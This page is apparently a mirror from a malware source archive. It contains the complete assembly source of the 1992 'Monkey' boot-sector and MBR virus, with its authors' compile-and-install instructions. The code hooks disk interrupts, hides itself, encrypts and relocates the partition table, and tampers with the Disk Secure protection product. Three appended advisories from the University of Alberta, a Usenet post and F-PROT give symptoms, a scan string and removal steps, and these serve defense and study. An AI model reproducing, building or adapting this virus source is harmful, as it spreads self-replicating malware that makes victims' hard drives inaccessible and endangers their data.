mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-30 06:55:27 +00:00
692 lines
22 KiB
NASM
692 lines
22 KiB
NASM
|
|
||
|
page 70,80
|
||
|
Name Monkey
|
||
|
|
||
|
;*******************************************************
|
||
|
;
|
||
|
; Monkey written at the city of champions
|
||
|
; - Edmonton - by UACVRS - Jan 1992.
|
||
|
;
|
||
|
; Monkey is a full stealth MBR/Boot self-replicating program with
|
||
|
; no payload but it does not save the HD's partition
|
||
|
; table in place. When the "infected" computer is booted
|
||
|
; from a floppy, c: drive will no longer be accessible.
|
||
|
;
|
||
|
; To compile: masm monkey (we used MASM 5.0)
|
||
|
; link monkey
|
||
|
; exe2bin monkey.exe monkey.co
|
||
|
; Use NU, or debug to copy monkey.co to the boot
|
||
|
; sector of a floppy. The diskette will not boot
|
||
|
; but will install itself on the hard drive.
|
||
|
;
|
||
|
; Bug: It will trash any floppies higher than
|
||
|
; 1.44meg, not deliberately.
|
||
|
;
|
||
|
;*******************************************************
|
||
|
|
||
|
Code Segment
|
||
|
Assume CS:Code,DS:CODE,ES:CODE
|
||
|
ORG 00H
|
||
|
|
||
|
MAIN:
|
||
|
JMP INITIAL
|
||
|
|
||
|
; space above 1fh is for floppy format data
|
||
|
|
||
|
ORG 1FH
|
||
|
INT_13 EQU THIS BYTE
|
||
|
|
||
|
PUSH DS
|
||
|
PUSH SI
|
||
|
PUSH DI
|
||
|
PUSH AX
|
||
|
PUSH CX
|
||
|
PUSH DX
|
||
|
|
||
|
CALL SET_HEAD
|
||
|
|
||
|
CMP AH,02H
|
||
|
JNZ END_ACTION
|
||
|
|
||
|
PUSH DX
|
||
|
SUB AX,AX
|
||
|
INT 1AH
|
||
|
|
||
|
TIME EQU $ + 2
|
||
|
CMP DL,40H
|
||
|
POP DX
|
||
|
JNB END_ACTION
|
||
|
|
||
|
CALL HANDLE_DISK
|
||
|
|
||
|
END_ACTION:
|
||
|
POP DX
|
||
|
POP CX
|
||
|
POP AX
|
||
|
POP DI
|
||
|
|
||
|
PUSH DX
|
||
|
PUSH CX
|
||
|
PUSH AX
|
||
|
|
||
|
CMP CX,03H ; YES, IS SECTOR LESS THAN 3?
|
||
|
JNB EXIT_2 ; NO, EXIT
|
||
|
|
||
|
CMP DH,BYTE PTR DS:[SI] ; Right head?
|
||
|
JNZ EXIT_2 ; NO, EXIT
|
||
|
|
||
|
CMP AH,02H ; READ ?
|
||
|
JZ STEALTH ; YES, STEALTH
|
||
|
|
||
|
CMP AH,03H ; WRITE ?
|
||
|
JNZ EXIT_2 ; NO, EXIT
|
||
|
; YES!
|
||
|
CMP DL,80H ; HARD DRIVE?
|
||
|
JB EXIT_2 ; NO, EXIT
|
||
|
|
||
|
SUB AH,AH ; else RESET DISK - make HD light blink
|
||
|
JMP SHORT EXIT_2 ; EXIT
|
||
|
STEALTH:
|
||
|
CALL INT13 ; READ
|
||
|
JB EXIT_3 ; ERROR?
|
||
|
|
||
|
CALL COMP_SIG ; MY RELATIVE?
|
||
|
JZ REDIRECT ; YES, REDIRECT
|
||
|
|
||
|
CALL COMP_PA ; NO, IS IT PA?
|
||
|
JZ REDIRECT ; YES, REDIRECT
|
||
|
|
||
|
EXIT_0:
|
||
|
CLC ; NO, RESET FLAG
|
||
|
JMP SHORT EXIT_3 ; EXIT
|
||
|
|
||
|
REDIRECT:
|
||
|
|
||
|
CALL CHSEC ; CALC. THE SECTOR TO HIDE & PUT IN CL
|
||
|
|
||
|
MOV DH,BYTE PTR DS:[SI+1] ; SET RIGHT HEAD
|
||
|
|
||
|
POP AX ; RESTORE AX
|
||
|
CALL INT13 ; RE-READ
|
||
|
CALL ENCRPT_PBR
|
||
|
POP CX ; RESTORE CX, DX
|
||
|
POP DX
|
||
|
JMP SHORT EXIT_4 ; EXIT
|
||
|
EXIT_2:
|
||
|
CALL INT13
|
||
|
EXIT_3:
|
||
|
POP DS
|
||
|
POP DS
|
||
|
POP DS
|
||
|
EXIT_4:
|
||
|
POP SI
|
||
|
POP DS
|
||
|
RETF 0002H
|
||
|
|
||
|
READ_SEC_1:
|
||
|
MOV AX,0201H ; READ
|
||
|
INT13 PROC NEAR
|
||
|
PUSHF
|
||
|
CALL DWORD PTR CS:INT13_ADDR ;***********
|
||
|
RET
|
||
|
INT13 ENDP
|
||
|
|
||
|
HOOK_ENTRY EQU THIS BYTE
|
||
|
HOOK:
|
||
|
INT 12H
|
||
|
MOV SI,004CH
|
||
|
PUSH SI
|
||
|
CMP BYTE PTR CS:HOME_SEC,02H ; I am in sector 2?
|
||
|
JZ SETUP_SPECIAL
|
||
|
|
||
|
SETUP_NORMAL:
|
||
|
|
||
|
CALL SHIFT_NORMAL
|
||
|
|
||
|
MOV DI,OFFSET INT13_ADDR
|
||
|
MOV CX,0002H
|
||
|
CLD
|
||
|
REPZ MOVSW
|
||
|
|
||
|
JMP SHORT STORE_SEGMENT
|
||
|
|
||
|
SETUP_SPECIAL:
|
||
|
|
||
|
CALL SHIFT_SPECIAL
|
||
|
|
||
|
STORE_SEGMENT:
|
||
|
POP SI
|
||
|
MOV WORD PTR DS:[SI],OFFSET INT_13 ; STORE MY ENTRY POINT
|
||
|
MOV DS:[SI+2],AX ; STORE MY SEGMENT
|
||
|
|
||
|
PATCH_OVER:
|
||
|
|
||
|
PUSH CS
|
||
|
POP DS
|
||
|
CALL PATCH ; PATCH OVER
|
||
|
PUSH ES ; PUSH SEGMENT
|
||
|
MOV AX,OFFSET JMP_ADDR
|
||
|
PUSH AX ; PUSH ADDRESS
|
||
|
STI
|
||
|
RETF ; FAR JMP
|
||
|
|
||
|
JMP_ADDR EQU THIS BYTE
|
||
|
BOOT:
|
||
|
MOV ES,CX
|
||
|
MOV BX,SP ; TO 0000:7C00
|
||
|
PUSH CX ; SAVE JMP SEGMENT
|
||
|
PUSH BX
|
||
|
|
||
|
MOV DX,0080H ; HANDLE C:
|
||
|
CALL SET_HEAD
|
||
|
CALL HANDLE_DISK
|
||
|
|
||
|
BOOT_SEC EQU $ + 1
|
||
|
MOV CL,05H ; FROM SECTOR 3 ????
|
||
|
|
||
|
BOOT_DISK EQU $ + 1
|
||
|
MOV DX,0100H ; C:, HEAD 0 ????
|
||
|
|
||
|
CALL READ_SEC_1 ; INT 13
|
||
|
|
||
|
CALL ENCRPT_PBR
|
||
|
|
||
|
RETF
|
||
|
|
||
|
HANDLE_DISK PROC NEAR
|
||
|
|
||
|
; *** READ SECTOR 1 ***
|
||
|
SUB CX,CX
|
||
|
INC CX
|
||
|
PUSH CX
|
||
|
|
||
|
MOV DH,[SI] ; HEAD
|
||
|
CALL READ_SEC_1 ; INT 13
|
||
|
JB END_HANDLE_DISK ; ERROR -> END
|
||
|
|
||
|
; *** COMPARE ***
|
||
|
CALL COMP_SIG
|
||
|
JZ E_2 ; SAME -> UPDATE MYSELF
|
||
|
|
||
|
; *** PA? ***
|
||
|
CALL COMP_PA ; Is it Pagett's disksec?
|
||
|
JNZ UPDATE_DISK ; NO
|
||
|
|
||
|
; *** OK? ***
|
||
|
INC CX
|
||
|
CMP WORD PTR ES:[BX+1FAH],00H ; when this byte in disksec is set
|
||
|
; to 0 means disksec would not do
|
||
|
; checksum of partitions - Pagett
|
||
|
; sucks
|
||
|
JZ E_2 ; SAME -> UPDATE MYSELF
|
||
|
|
||
|
MOV WORD PTR ES:[BX+1FAH],00H ; set this to zero
|
||
|
MOV CL,1H ; write the change back to sector 1
|
||
|
CALL WRITE_SEC_1 ;
|
||
|
JB END_HANDLE_DISK
|
||
|
|
||
|
; *** YES! READ SECTOR 2 ***
|
||
|
INC CX ; yes,Pagette 's disksecure is on sector 1
|
||
|
MOV DH,[SI+2] ; My relative is on sector 2 - read sector 2
|
||
|
CALL READ_SEC_1 ; INT 13
|
||
|
JB END_HANDLE_DISK ; ERROR -> END
|
||
|
POP AX
|
||
|
PUSH CX
|
||
|
|
||
|
UPDATE_DISK:
|
||
|
CALL CHSEC ; CALC. THE SECTOR TO HIDE & PUT IN CL
|
||
|
CALL ENCRPT_PBR
|
||
|
INC SI
|
||
|
CALL WRITE_SEC_1
|
||
|
DEC SI
|
||
|
JB END_HANDLE_DISK
|
||
|
|
||
|
CALL ENCRPT_PBR
|
||
|
PUSH CX
|
||
|
CALL PATCH
|
||
|
POP CX
|
||
|
|
||
|
PUSH DX
|
||
|
CMP DL,80H
|
||
|
JNB E_1
|
||
|
XOR DL,DL
|
||
|
E_1:
|
||
|
MOV WORD PTR ES:[BX+BOOT_DISK],DX
|
||
|
POP DX
|
||
|
MOV BYTE PTR ES:[BX+BOOT_SEC],CL
|
||
|
POP CX
|
||
|
PUSH CX
|
||
|
MOV BYTE PTR ES:[BX+OFFSET HOME_SEC],CL
|
||
|
MOV WORD PTR ES:[BX+OFFSET BOOT_SIG],0AA55H
|
||
|
|
||
|
E_2:
|
||
|
CALL WRITE_SEC_1
|
||
|
|
||
|
END_HANDLE_DISK:
|
||
|
POP AX
|
||
|
RET
|
||
|
|
||
|
HANDLE_DISK ENDP
|
||
|
|
||
|
WRITE_SEC_1 PROC NEAR
|
||
|
MOV DH,[SI]
|
||
|
WRITE_SEC_2:
|
||
|
MOV AX,0301H
|
||
|
CALL INT13
|
||
|
RET
|
||
|
WRITE_SEC_1 ENDP
|
||
|
|
||
|
COMP_SIG PROC NEAR
|
||
|
CMP ES:[BX+OFFSET PROG_SIG],9219H
|
||
|
RET
|
||
|
COMP_SIG ENDP
|
||
|
|
||
|
COMP_PA PROC NEAR
|
||
|
CMP WORD PTR ES:[BX+119H],6150H ; PA?
|
||
|
RET
|
||
|
COMP_PA ENDP
|
||
|
|
||
|
HOME_SEC DB 01H
|
||
|
|
||
|
FLOPPY_HEAD DB 00H,01H,01H
|
||
|
HARD_HEAD DB 00H,00H,00H
|
||
|
|
||
|
; 360 720 1.2 1.44
|
||
|
FLOP_SECT_TABLE DB 02H,05H,09H,0BH
|
||
|
SAVE_SECT_TABLE DB 03H,05H,0EH,0EH
|
||
|
|
||
|
CHSEC PROC NEAR
|
||
|
PUSH DI
|
||
|
PUSH SI
|
||
|
MOV AL,ES:[BX+14H]
|
||
|
MOV CX,0004H
|
||
|
CHSEC_1:
|
||
|
MOV SI,CX
|
||
|
DEC SI
|
||
|
CMP FLOP_SECT_TABLE[SI],AL
|
||
|
JZ CHSEC_END_1
|
||
|
LOOP CHSEC_1
|
||
|
MOV CL,03H
|
||
|
JMP SHORT CHSEC_END_2
|
||
|
CHSEC_END_1:
|
||
|
MOV CL,SAVE_SECT_TABLE[SI]
|
||
|
CHSEC_END_2:
|
||
|
POP SI
|
||
|
POP DI
|
||
|
RET
|
||
|
CHSEC ENDP
|
||
|
|
||
|
SHIFT_NORMAL PROC NEAR
|
||
|
; FIND THE SEGMENT TO HIDE
|
||
|
DEC AX
|
||
|
MOV DS:[413H],AX
|
||
|
|
||
|
SHIFT_SPECIAL:
|
||
|
MOV CL,06H
|
||
|
SHL AX,CL
|
||
|
ADD AL,20H
|
||
|
MOV ES,AX
|
||
|
RET
|
||
|
SHIFT_NORMAL ENDP
|
||
|
|
||
|
PATCH PROC NEAR ; PATCH ON BOOT SECTOR STARTING AT BYTE int_13
|
||
|
PUSH SI
|
||
|
MOV DI,BX
|
||
|
MOV SI,OFFSET INT_13
|
||
|
ADD DI,SI
|
||
|
; CLD
|
||
|
MOV CX,OFFSET PROG_END - OFFSET INT_13
|
||
|
REPZ MOVSB
|
||
|
|
||
|
PATCH_JMP:
|
||
|
MOV DI,BX
|
||
|
|
||
|
SUB SI,SI
|
||
|
MOV CL,3H
|
||
|
REPZ MOVSB
|
||
|
|
||
|
POP SI
|
||
|
RET
|
||
|
PATCH ENDP
|
||
|
|
||
|
SET_HEAD PROC NEAR
|
||
|
PUSH CS
|
||
|
POP DS
|
||
|
|
||
|
MOV SI,OFFSET FLOPPY_HEAD
|
||
|
CMP DL,80H
|
||
|
JB SET_HEAD_EXIT
|
||
|
MOV SI,OFFSET HARD_HEAD
|
||
|
SET_HEAD_EXIT:
|
||
|
RET
|
||
|
SET_HEAD ENDP
|
||
|
|
||
|
INITIAL:
|
||
|
CLI
|
||
|
SUB BX,BX
|
||
|
MOV DS,BX
|
||
|
MOV SS,BX
|
||
|
MOV SP,7C00H
|
||
|
JMP HOOK
|
||
|
NOP
|
||
|
NOP
|
||
|
|
||
|
ENCRPT_PBR:
|
||
|
PUSH DI
|
||
|
PUSH CX
|
||
|
PUSH AX
|
||
|
|
||
|
MOV DI,BX
|
||
|
MOV CX,200H
|
||
|
|
||
|
CLD
|
||
|
ENCRPT_1:
|
||
|
MOV AL,ES:[DI]
|
||
|
ENCRPT_CODE EQU $ + 0001H
|
||
|
XOR AL,2EH
|
||
|
STOSB
|
||
|
LOOP ENCRPT_1
|
||
|
|
||
|
POP AX
|
||
|
POP CX
|
||
|
POP DI
|
||
|
RET
|
||
|
|
||
|
|
||
|
ORG 01F4H
|
||
|
;PROG_NAME DB "Monkey"
|
||
|
PROG_NAME DB 6dh,8fh,8eh,8bh,85h,99h
|
||
|
|
||
|
ORG 01FAH
|
||
|
PROG_SIG DB 19H,92H
|
||
|
|
||
|
PROG_END EQU THIS BYTE
|
||
|
|
||
|
ORG 01FCH
|
||
|
INT13_ADDR DB 00H,00H
|
||
|
|
||
|
ORG 01FEH
|
||
|
BOOT_SIG DB 55H,0AAH
|
||
|
PROG_TAIL EQU THIS BYTE
|
||
|
|
||
|
PROG_LEN EQU OFFSET PROG_END - OFFSET INT_13
|
||
|
|
||
|
|
||
|
CODE ENDS
|
||
|
END MAIN
|
||
|
|
||
|
; from U of A
|
||
|
NEW COMPUTER VIRUS THREAT Posted: July 9, 1992
|
||
|
|
||
|
MONKEY VIRUSES ON PCs
|
||
|
|
||
|
The Monkey viruses are main boot record/boot sector infectors,
|
||
|
derived from the Empire D virus. Two variants of the Monkey virus
|
||
|
have been identified. Of particular concern is the fact these
|
||
|
viruses can infect computers protected by the Disk Secure program,
|
||
|
while causing no noticeable changes. Symptoms of infection for
|
||
|
those computers without Disk Secure include memory reduction and
|
||
|
hard drive partitions which are not accessible when booting up
|
||
|
with a floppy disk. When the viruses are active on computers
|
||
|
without Disk Secure, total memory will be reduced by 1,024 bytes.
|
||
|
|
||
|
Monkey viruses destroy partition table data. If an infected system
|
||
|
is booted up from a clean boot disk, DOS claims to be unable to
|
||
|
access the hard drive partitions. A DIR C: command will return the
|
||
|
message, "Invalid drive specification."
|
||
|
|
||
|
Detection
|
||
|
|
||
|
The simplest method of detection involves recognizing a 1K
|
||
|
decrease in memory. The DOS commands CHKDSK and MEM will return 1K
|
||
|
less "total conventional memory" than is normal.
|
||
|
|
||
|
Of the popular virus scanning products, only F-PROT version 2.04A
|
||
|
finds the Monkey viruses, calling them a "New variant of Stoned."
|
||
|
It will identify the virus in memory as well. The F-PROT Virstop
|
||
|
driver does not recognize the Monkey viruses on boot-up.
|
||
|
|
||
|
Disk Secure version 1.15a (ds115a.zip) has a version of the CHKSEC
|
||
|
program that will notice the presence of the Monkey viruses. Note
|
||
|
that Disk Secure itself will not detect the infection: it is
|
||
|
important that the CHKSEC command be called from the autoexec.bat
|
||
|
file.
|
||
|
|
||
|
As well, a special program to find and remove the Monkey viruses,
|
||
|
called KILLMONK, has been written at the University of Alberta.
|
||
|
|
||
|
Removal
|
||
|
|
||
|
To clean a hard disk: If you have previously saved a copy of the
|
||
|
clean main boot record (MBR), then this can be restored. (Many
|
||
|
anti-virus products have an automated way of doing this.) If you
|
||
|
don't have a copy of the original MBR, and don't know what values
|
||
|
your partition table should have, then the KILLMONK program will
|
||
|
restore the partition table for you.
|
||
|
|
||
|
To restore diskettes: Use the KILLMONK program.
|
||
|
|
||
|
The newest version of F-PROT (version 2.04A) and the KILLMONK
|
||
|
program, are both available, free of charge, from Computing and
|
||
|
Network Services. Bring a formatted diskette to the Microcomputer
|
||
|
Demonstration Centre (MDC), in the basement of the Bookstore, or a
|
||
|
ready-made diskette can be purchased for $2.00 from the CNS User
|
||
|
Support Centre at 302 General Services Building. These programs
|
||
|
can also be downloaded from the MTS account VIR.
|
||
|
|
||
|
;From: martin@cs.ualberta.ca (Tim Martin; FSO; Soil Sciences)
|
||
|
Subject: WARNING - new viruses, Monkey.1 and Monkey.2 (PC)
|
||
|
Date: 20 Jul 92 09:10:09 GMT
|
||
|
|
||
|
Virus Name: MONKEY.1, MONKEY.2 (Empire variants)
|
||
|
V Status: New
|
||
|
Discovery: February, 1992
|
||
|
Symptoms: Memory reduction, hard drive partitions not accessible on
|
||
|
floppy bootup.
|
||
|
Origin: Alberta, Canada
|
||
|
Eff. Length: 512 bytes
|
||
|
Type Code: BPRtS (Boot and Partition table infector - Resident TOM -
|
||
|
Stealth)
|
||
|
Detection: CHKDSK, F-PROT 2.04, CHKSEC from Disk Secure 1.15, KILLMONK
|
||
|
Removal: Cold boot from clean, write-protected floppy, replace MBR
|
||
|
(hard
|
||
|
disk) or Boot Sector (floppy).
|
||
|
|
||
|
General Comments:
|
||
|
The Monkey viruses are Main Boot Record / Boot Sector infectors,
|
||
|
derived from the Empire D virus. Two variants of the Monkey virus
|
||
|
have been identified: their most obvious difference is in the initial
|
||
|
bytes at offset 0:
|
||
|
Monkey.1: E9 CD 01 (JMP 02D0)
|
||
|
Monkey.2: EB 1E 90 (JMP 0020 ; NOP)
|
||
|
|
||
|
Both variants keep the original sector's data at offset 03h - 1fh. In
|
||
|
boot sectors, this region contains data required to identify the
|
||
|
diskette format. This solves the problem noticed with earlier
|
||
|
variants of Empire, whereby infected 720k diskettes were sometimes
|
||
|
unreadable.
|
||
|
|
||
|
The Monkey viruses take 1k from the top of memory. When active, total
|
||
|
memory will be reduced by 1024 bytes.
|
||
|
|
||
|
The Monkey viruses use stealth to protect both the MBR and diskette
|
||
|
boot sectors. When active in memory, Int 13h calls cannot access the
|
||
|
infected sector of either hard disks or floppies.
|
||
|
|
||
|
The Monkey viruses are not polimorphic. They do not encode any of the
|
||
|
virus, as was done by some of the earlier Empire variants. But before
|
||
|
saving the clean MBR or boot sector to a hiding place, the Monkey
|
||
|
viruses do encode that sector, using an "XOR 2Eh". This creates a
|
||
|
problem for any disinfecting program that recover the initial boot
|
||
|
sector or MBR by copying it from the hiding place.
|
||
|
|
||
|
When a hard disk is infected, the encoded MBR is put at side 0,
|
||
|
cylinder 0, sector 3.
|
||
|
|
||
|
When a floppy diskette is infected, the original boot sector is placed
|
||
|
in the bottom sector of the root directory. This means directory
|
||
|
entries will be lost only if the root directory is nearly full -- more
|
||
|
than 96 entries on double density diskettes, or more than 208 entries
|
||
|
on high density diskettes. The virus is designed to identify only the
|
||
|
four most common diskette formats. If the diskette is not of a
|
||
|
recognized format, the boot sector is put on side 1, sector 3. I have
|
||
|
no idea what would happen to a 2.88Mb diskette, but I suspect the
|
||
|
virus would damage the File Allocation Table, causing loss of data.
|
||
|
|
||
|
The Monkey viruses do not put any messages to the screen at any time,
|
||
|
but the virus code does contain, encrypted, the string "Monkey",
|
||
|
followed by bytes 1992h. It may be significant that the chinese Year
|
||
|
of the Monkey began in February 1992.
|
||
|
|
||
|
The most remarkable characteristic of the Monkey viruses is that they
|
||
|
were designed as an attack on Padgett Peterson's "Disk Secure"
|
||
|
product. When a computer is booted from an infected diskette, the
|
||
|
virus first checks whether Disk Secure is on the hard disk. If it is,
|
||
|
the virus puts itself in sector 2, rather than sector 1, and slightly
|
||
|
modifies Disk Secure, so that Disk Secure will load the virus after
|
||
|
Disk Secure has checked the system and loaded itself. The monkey
|
||
|
viruses install themselves and above Disk Secure, in memory, at offset
|
||
|
200h.
|
||
|
|
||
|
The Monkey viruses do not save the partition table data in place, so
|
||
|
if an infected system is booted from a clean boot disk, DOS claims to
|
||
|
be unable to access the hard drive partitions. A DIR C: command will
|
||
|
return "Invalid drive specification".
|
||
|
|
||
|
Detection:
|
||
|
Of the popular virus scanning products, only F-PROT 2.04 finds the
|
||
|
Monkey viruses, calling them a "New variant of stoned". It will
|
||
|
identify the virus in memory as well. The F-PROT Virstop driver does
|
||
|
not recognise the Monkey viruses, on boot-up.
|
||
|
|
||
|
Disk Secure v. 1.15a (ds115a.zip) has a version of CHKSEC that will
|
||
|
notice the presence of the Monkey viruses. Notice that Disk Secure
|
||
|
itself will not detect the infection: it is important that the CHKSEC
|
||
|
command be called from the autoexec.bat file.
|
||
|
|
||
|
The simplest detection still involves recognizing a 1k decrease in
|
||
|
memory. CHKDSK and MEM will return 1k less "total conventional
|
||
|
memory" than normal.
|
||
|
|
||
|
A special program to find and remove the Monkey viruses, called
|
||
|
KILLMONK, has been written at the University of Alberta. I hope to
|
||
|
make this available to the anti-virus community shortly.
|
||
|
|
||
|
Removal:
|
||
|
The undocumented /MBR option of FDISK does remove the Monkey virus
|
||
|
from the MBR, provided the computer was booted from a clean floppy,
|
||
|
but it does not restore the correct partition table values. The
|
||
|
problem is that the partition table is not in place in sector one: the
|
||
|
table is encoded, in sector 3.
|
||
|
|
||
|
To clean a hard disk: If you have previously saved a copy of the clean
|
||
|
MBR, then this can be restored. (Many anti-virus products have an
|
||
|
automated way of doing this.) If you don't have a copy of the
|
||
|
original MBR, and don't know what values your partition table should
|
||
|
have, then the KILLMONK program may be what you need.
|
||
|
|
||
|
To restore diskettes: Padgett Peterson's FIXFBR works very well,
|
||
|
though it doesn't recognize that the disk is infected. Another
|
||
|
alternative is the KILLMONK program.
|
||
|
|
||
|
Scan String:
|
||
|
The following hexidecimal string is in both variants of Monkey. It is
|
||
|
from the code the virus uses to recognize itself.
|
||
|
26 81 bf fa 01 19 92 c3 26 81 bf 19 01 50 61
|
||
|
|
||
|
Tim
|
||
|
|
||
|
; From F-PROT
|
||
|
|
||
|
Name: Monkey
|
||
|
Type: Boot MBR Stealth
|
||
|
|
||
|
The Monkey virus was first discovered in Edmonton, Canada, in the
|
||
|
year 1991. The virus spread quickly to USA, Australia and UK.
|
||
|
Monkey is one of the most common boot sector viruses.
|
||
|
|
||
|
As the name indicates, Monkey is a distant relative of Stoned.
|
||
|
Its technical properties make it quite a remarkable virus,
|
||
|
however. The virus infects the Master Boot Records of hard disks
|
||
|
and the DOS boot records of diskettes, just like Stoned. Monkey
|
||
|
spreads only through diskettes.
|
||
|
|
||
|
Monkey does not let the original partition table remain in its
|
||
|
proper place in the Master Boot Record, as Stoned does. Instead
|
||
|
it moves the whole Master Boot Record to the hard disk's third
|
||
|
sector, and replaces it with its own code. The hard disk is
|
||
|
inaccesible after a diskette boot, since the operating system
|
||
|
cannot find valid partition data in the Master Boot Record -
|
||
|
attempts to use the hard disk result in the DOS error message
|
||
|
"Invalid drive specification".
|
||
|
|
||
|
When the computer is booted from the hard disk, the virus is
|
||
|
executed first, and the hard disk can thereafter be used
|
||
|
normally. The virus is not, therefore, easily noticeable, unless
|
||
|
the computer is booted from a diskette.
|
||
|
|
||
|
The fact that Monkey encrypts the Master Boot Record besides
|
||
|
relocating it on the disk makes the virus still more difficult to
|
||
|
remove. The changes to the Master Boot Record cannot be detected
|
||
|
while the virus is active, since it rerouts the BIOS-level disk
|
||
|
calls through its own code. Upon inspection, the hard disk seems
|
||
|
to be in its original shape.
|
||
|
|
||
|
The relocation and encryption of the partition table render two
|
||
|
often-used disinfection procedures unviable. One of these is the
|
||
|
MS-DOS command FDISK /MBR, capable of removing most viruses that
|
||
|
infect Master Boot Records. The other is using a disk editor to
|
||
|
restore the Master Boot Record back on the zero track. Although
|
||
|
both of these procedures destroy the actual virus code, the
|
||
|
computer cannot be booted from the hard disk afterwards.
|
||
|
|
||
|
There are five different ways to remove the Monkey
|
||
|
virus:
|
||
|
o The original Master Boot Record and partition table can
|
||
|
be restored from a backup taken before the infection.
|
||
|
Such a backup can be made by using, for example, the
|
||
|
MIRROR /PARTN command of MS-DOS 5.
|
||
|
|
||
|
o The hard disk can be repartitioned by using the FDISK
|
||
|
program, after which the logical disks must be formatted.
|
||
|
All data on the hard disk will consequently be lost,
|
||
|
however.
|
||
|
|
||
|
o The virus code can be overwritten by using FDISK/MBR, and
|
||
|
the partition table restored manually. In this case, the
|
||
|
partition values of the hard disk must be calculated and
|
||
|
inserted in the partition table with the help of a disk
|
||
|
editor. The method requires expert knowledge of the disk
|
||
|
structure, and its success is doubtful.
|
||
|
|
||
|
o It is possible to exploit Monkey's stealth capabilities
|
||
|
by taking a copy of the zero track while the virus is
|
||
|
active. Since the virus hides the changes it has made,
|
||
|
this copy will actually contain the original Master Boot
|
||
|
Record. This method is not recommendable, because the
|
||
|
diskettes used in the copying may well get infected.
|
||
|
|
||
|
o The original zero track can be located, decrypted and
|
||
|
moved back to its proper place. As a result, the hard
|
||
|
disk is restored to its exact original state. F-PROT uses
|
||
|
this method to disinfect the Monkey virus.
|
||
|
|
||
|
It is difficult to spot the virus, since it does not activate in
|
||
|
any way. A one-kilobyte reduction in DOS memory is the only
|
||
|
obvious sign of its presence. The memory can be checked with, for
|
||
|
instance, DOS's CHKDSK and MEM programs. However, even if MEM
|
||
|
reports that the computer has 639 kilobytes of basic memory
|
||
|
instead of the more common 640 kilobytes, it does not necessarily
|
||
|
mean that the computer is infected. In many computers, the BIOS
|
||
|
allocates one kilobyte of basic memory for its own use.
|
||
|
|
||
|
The Monkey virus is quite compatible with different diskette
|
||
|
types. It carries a table containing data for the most common
|
||
|
diskettes. Using this table, the virus is able to move a
|
||
|
diskette's original boot record and a part of its own code to a
|
||
|
safe area on the diskette. Monkey does not recognize 2.88
|
||
|
megabyte ED diskettes, however, and partly overwrites their File
|
||
|
Allocation Tables.
|
||
|
|
||
|
|